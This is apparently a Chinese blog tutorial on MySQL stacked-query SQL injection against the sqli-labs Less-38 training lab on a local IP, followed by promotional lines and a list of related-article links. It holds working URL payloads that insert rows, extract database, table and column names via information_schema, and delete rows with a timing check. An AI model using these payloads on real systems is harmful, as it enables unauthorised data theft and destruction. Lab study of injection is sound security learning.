你上学时没读过的书、没上过的课、没跑过的步,总有一天会让你全部还回来。。。

----  网易云热评

一、堆叠注入介绍

1、多条sql语句同时执行

2、union只能执行查询语句,堆叠可以执行增删改查

3、同时执行三条语句

select 1;select 2;select 3;

二、插入注入

1、找到注入点,添加一条数据

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(66,'aiyou','bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=66

2、获取数据库名称

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(67,database(),'bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=67获取数据库名称

3、获取数据库中的表名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(71,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 2,1) ,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=71获取表名信息

4、获取表中的字段名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(74,(select column_name from information_schema.columns where table_name="users" limit 13,1) ,(select column_name from information_schema.columns where table_name="users" limit 12,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=74获取字段信息

三、删除删除注入

http://192.168.139.129/sqli/Less-38/?id=1';delete from users where id=74 and sleep(if((select database())=0x7365637572697479,5,0));

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

Mysql注入 -- 堆叠注入相关推荐

  1. SQL注入——堆叠注入

    一.堆叠注入的原理 1.介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束.试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注 ...

  2. SQL注入——堆叠注入入门题:领取 iPad Pro

    堆叠注入:领取 iPad Pro   初学Web安全方面内容,做了一道由学长出的SQL注入题,难度不大,适合新手了解堆叠注入.这里简单介绍一下过程.   题目如下:   首先,可以在输入框内输入数据测 ...

  3. SQL注入堆叠注入二次注入

    蓝易云高性能服务器 | | | | |

  4. mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入

    盲注 关键点是 根据页面返回内容分析 Payload 中的问题是否为真,然后通过多次测试遍历出想要的数据 布尔盲注 目标地址:http://newspaper.com/items.php?id=2 对 ...

  5. SQL注入之堆叠注入(sql-lab第38关)

    什么是堆叠注入 在SQL中,分号(;)是用来表示一条SQL语句结束的.试想一下我们在分号结束一个SQL语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入.而堆叠注入可以执行的是任 ...

  6. (17)网络安全:cookie注入、二次注入、DNSlog注入、中转注入、堆叠注入的原理及注入过程

    目录 cookie注入 sqli-lasb-master less-21 方法一:用burpsuite进行抓包后修改 方法二:安装火狐的cookie manager等插件进行修改cookie 第一步: ...

  7. mysql 多行拼接注入_MySQL注入汇总

    Mysql注释符: 单行注释: # 在对URL使用过程中可能遇到Unicode编码问题,可常用%23代替 多行注释:/**/ 单行注释: -- 此处需要注意后面存在空格,否则报错 0.万能密码 (基于 ...

  8. 堆叠注入-强网杯2019随便注

    靶场地址 链接(click me) 发现很友情的提示,emmm,那就先使用不同的 payload 进行测试,看下结果吧 直接点击提交,看结果,输出为一个数组,此处应有文章可做,再测试其他payload ...

  9. slqilabs靶场记录堆叠注入(八)

    slqilabs靶场记录堆叠注入(八) Stacked injections-堆叠注入 从字面意思上来看就是一堆的sql语句一起执行.而在真实的运用中也是这样的,我们知道在mysql中,主要是在命令行 ...

最新文章

  1. SQL Server中的执行引擎入门
  2. java project 部署_关于Java Project项目在Linux下部署步骤及注意事项
  3. Android系统(2)---init.rc知识
  4. Python四:HoughCircles()霍夫变换
  5. kl散度与js散度_数据集相似度度量之KLamp;JS散度
  6. LeetCode 300. 最长上升子序列(动态规划)
  7. 避免内存泄露及内存的规范化使用
  8. 微软输入法怎么最小化到托盘_Windows下的五笔输入法哪个最好用?我来推荐几款...
  9. echart——时间点和时间段综合显示
  10. Msm8960(APQ8064)平台的MSM-AOSP-kitkat编译适配(1):基础知识
  11. iis 程序池设置及详解
  12. Android模拟器使用SD卡(2)
  13. Indilinx主控固态量产成功修复步骤
  14. 银联的跨行清算体系架构分析
  15. 土木工程与计算机专业考研学校排名,土木工程专业考研学校排名
  16. Linux文件操作命令及磁盘分区与文件系统
  17. 为整数线性规划(integer linear programming,ILP)
  18. 计算机在航空航天的应用ppt,数字图像处理技术的应用_北京航空航天大学:数字图像处理技术的应用_ppt_大学课件预览_高等教育资讯网...
  19. 【计算机网络:自顶向下方法】期末复习总结(USTC 2020秋 zq班)
  20. 医疗行业S2B2B商城系统

热门文章

  1. Spring-Learn
  2. 排序算法——1冒泡排序算法
  3. POST http://XXXXXXXXXXX net::ERR_FAILED 413
  4. 以太坊RPC调用智能合约
  5. 应用sobel算子算法c语言,Sobel算子详解
  6. el-table 居中显示
  7. numpy 入门学习 one_day
  8. zeros什么意思_zeros是什么意思
  9. electron-vue全局变量
  10. 模仿猫眼电影静态网页展示2